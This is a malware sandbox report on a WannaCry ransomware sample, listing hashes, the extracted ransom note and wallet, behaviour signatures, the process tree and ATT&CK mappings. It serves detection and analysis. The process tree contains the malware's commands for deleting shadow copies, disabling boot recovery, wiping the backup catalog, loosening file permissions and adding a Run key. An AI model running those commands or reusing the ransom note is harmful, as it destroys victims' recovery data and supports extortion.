Resubmissions

19-03-2022 08:22

220319-j9qwraech8 10

19-03-2022 08:21

220319-j84ffseebn 6

16-03-2022 15:34

220316-sz9qjsfba4 10

17-02-2022 18:50

220217-xhdn1aedap 10

17-02-2022 13:21

220217-ql2rnsbbf7 10

17-02-2022 13:20

220217-qljwvscdar 1

17-02-2022 13:20

220217-qlb61sbbf6 1

17-02-2022 13:19

220217-qkv8hacdap 1

17-02-2022 12:49

220217-p2gwrscchl 10

17-02-2022 08:03

220217-jxx5ascaan 1

Analysis

  • max time kernel
    145s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    15-07-2020 08:05

General

  • Target

    important.exe

  • Size

    3.4MB

  • MD5

    84c82835a5d21bbcf75a61706d8ab549

  • SHA1

    5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

  • SHA256

    ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

  • SHA512

    90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Drops startup file 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Loads dropped DLL 39 IoCs
  • JavaScript code in executable 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 104 IoCs
  • Executes dropped EXE 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

Processes

  • C:\Users\Admin\AppData\Local\Temp\important.exe
    "C:\Users\Admin\AppData\Local\Temp\important.exe"
    1⤵
    • Drops startup file
    • Sets desktop wallpaper using registry
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      2⤵
      • Views/modifies file attributes
      PID:1600
    • C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1016
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      taskdl.exe
      2⤵
      • Executes dropped EXE
      PID:1896
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c 262051594800314.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\SysWOW64\cscript.exe
        cscript.exe //nologo m.vbs
        3⤵
        • Loads dropped DLL
        PID:1836
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      @WanaDecryptor@.exe co
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:1956
      • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
        TaskData\Tor\taskhsvc.exe
        3⤵
        • Loads dropped DLL
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:612
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @WanaDecryptor@.exe vs
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        @WanaDecryptor@.exe vs
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        PID:2028
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:1992
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1592
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      taskdl.exe
      2⤵
      • Executes dropped EXE
      PID:1660
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Executes dropped EXE
      PID:1400
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      @WanaDecryptor@.exe
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Sets desktop wallpaper using registry
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      PID:816
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pzkqrqnhucon571" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
      2⤵
        PID:924
        • C:\Windows\SysWOW64\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pzkqrqnhucon571" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:1016
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:1916
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Executes dropped EXE
        PID:1840
      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        @WanaDecryptor@.exe
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:1828
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:1356
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Executes dropped EXE
        PID:1348
      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        @WanaDecryptor@.exe
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:1780
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:1460
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Executes dropped EXE
        PID:1248
      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        @WanaDecryptor@.exe
        2⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:1904
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Modifies service
      PID:760

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Hidden Files and Directories

    1
    T1158

    Registry Run Keys / Startup Folder

    1
    T1060

    Modify Existing Service

    1
    T1031

    Defense Evasion

    File Permissions Modification

    1
    T1222

    File Deletion

    2
    T1107

    Hidden Files and Directories

    1
    T1158

    Modify Registry

    4
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Collection

    Data from Local System

    1
    T1005

    Impact

    Inhibit System Recovery

    2
    T1490

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\0.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\00000000.res
    • C:\Users\Admin\AppData\Local\Temp\1.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\10.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\11.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\12.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\13.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\14.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\15.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\16.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\17.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\18.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\19.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\2.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\20.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\21.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\22.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\23.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\262051594800314.bat
    • C:\Users\Admin\AppData\Local\Temp\3.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\4.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\5.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\6.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\7.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\8.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\9.WNCRYT
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
    • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
    • C:\Users\Admin\AppData\Local\Temp\b.wnry
    • C:\Users\Admin\AppData\Local\Temp\c.wnry
    • C:\Users\Admin\AppData\Local\Temp\c.wnry
    • C:\Users\Admin\AppData\Local\Temp\m.vbs
    • C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry
    • C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry
    • C:\Users\Admin\AppData\Local\Temp\r.wnry
    • C:\Users\Admin\AppData\Local\Temp\s.wnry
    • C:\Users\Admin\AppData\Local\Temp\t.wnry
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
    • C:\Users\Admin\AppData\Local\Temp\u.wnry
    • C:\Users\Admin\Desktop\@WanaDecryptor@.bmp
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
    • \Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskdl.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • \Users\Admin\AppData\Local\Temp\taskse.exe
    • memory/612-412-0x0000000002A50000-0x0000000002A61000-memory.dmp
      Filesize

      68KB

    • memory/612-415-0x0000000003320000-0x0000000003331000-memory.dmp
      Filesize

      68KB

    • memory/612-78-0x0000000002A50000-0x0000000002A61000-memory.dmp
      Filesize

      68KB

    • memory/612-79-0x0000000002E60000-0x0000000002E71000-memory.dmp
      Filesize

      68KB

    • memory/612-80-0x0000000002A50000-0x0000000002A61000-memory.dmp
      Filesize

      68KB

    • memory/612-245-0x0000000002A50000-0x0000000002A61000-memory.dmp
      Filesize

      68KB

    • memory/612-64-0x0000000000000000-mapping.dmp
    • memory/612-246-0x0000000002E60000-0x0000000002E71000-memory.dmp
      Filesize

      68KB

    • memory/612-247-0x0000000002A50000-0x0000000002A61000-memory.dmp
      Filesize

      68KB

    • memory/612-413-0x0000000003320000-0x0000000003331000-memory.dmp
      Filesize

      68KB

    • memory/612-414-0x0000000003730000-0x0000000003741000-memory.dmp
      Filesize

      68KB

    • memory/816-725-0x0000000002320000-0x0000000002321000-memory.dmp
      Filesize

      4KB

    • memory/816-719-0x0000000000000000-mapping.dmp
    • memory/924-722-0x0000000000000000-mapping.dmp
    • memory/1016-726-0x0000000000000000-mapping.dmp
    • memory/1016-1-0x0000000000000000-mapping.dmp
    • memory/1248-783-0x0000000000000000-mapping.dmp
    • memory/1344-43-0x0000000000000000-mapping.dmp
    • memory/1348-771-0x0000000000000000-mapping.dmp
    • memory/1356-743-0x0000000000000000-mapping.dmp
    • memory/1400-715-0x0000000000000000-mapping.dmp
    • memory/1460-779-0x0000000000000000-mapping.dmp
    • memory/1496-38-0x0000000010000000-0x0000000010010000-memory.dmp
      Filesize

      64KB

    • memory/1532-707-0x0000000000000000-mapping.dmp
    • memory/1592-709-0x0000000000000000-mapping.dmp
    • memory/1600-0-0x0000000000000000-mapping.dmp
    • memory/1660-713-0x0000000000000000-mapping.dmp
    • memory/1780-774-0x0000000000000000-mapping.dmp
    • memory/1828-739-0x0000000000000000-mapping.dmp
    • memory/1836-45-0x0000000000000000-mapping.dmp
    • memory/1836-49-0x0000000002830000-0x0000000002834000-memory.dmp
      Filesize

      16KB

    • memory/1840-735-0x0000000000000000-mapping.dmp
    • memory/1896-41-0x0000000000000000-mapping.dmp
    • memory/1904-787-0x0000000000000000-mapping.dmp
    • memory/1916-731-0x0000000000000000-mapping.dmp
    • memory/1948-55-0x0000000000000000-mapping.dmp
    • memory/1956-53-0x0000000000000000-mapping.dmp
    • memory/1992-708-0x0000000000000000-mapping.dmp
    • memory/2028-59-0x0000000000000000-mapping.dmp
    • memory/2028-58-0x0000000000000000-mapping.dmp